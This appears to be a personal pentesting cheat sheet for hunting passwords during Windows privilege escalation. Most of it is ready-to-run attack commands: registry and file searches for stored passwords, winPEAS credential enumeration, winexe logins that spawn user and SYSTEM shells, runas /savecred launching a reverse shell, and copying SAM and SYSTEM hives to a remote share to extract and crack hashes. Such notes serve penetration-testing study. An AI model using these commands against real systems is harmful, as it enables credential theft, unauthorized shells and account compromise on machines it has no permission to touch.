Password Hunting

  • Many of these will be automatically found by winpeas

  • This is one of the LAST things I look for because if it wasn't found by winpeas, it's probably tedious af so I don't go for it till the end

Registry

reg query HKLM /f password /t REG_SZ /s reg query HKCM /f password /t REG_SZ /s
  • TONS of results

.\winPEASany.exe quiet filesinfo userinfo
  • Spawn a shell

winexe -U 'admin%password123' //192.168.X.X cmd.exe
  • Or a system shell

winexe -U 'admin%password123' --system //192.168.X.X cmd.exe

Saved Creds

.\winPEASany.exe quiet cmd windowscreds
cmdkey /list
  • Start listener

runas /savecred /user:admin C:\path\to\reverseshell.exe

Config Files

  • Search current directory

dir /s *pass* == *.config findstr /si password *.xml *.ini *.txt
  • A lot of this kind of searching will be intuitive based off of certain things noticed while enumerating

SAM

  • With SAM and SYSTEM files the hashes can be extracted

C:\Windows\System32\config
  • Cannot get these with system running, but maybe the backups

C:\Windows\System32\config\RegBack
C:\Windows\Repair
  • Copy to kali and crack

copy C:\Windows\Repair\SAM \\192.168.X.X\files copy C:\Windows\Repair\SYSTEM \\192.168.X.X\files
pwdump.py SYSTEM SAM

Last updated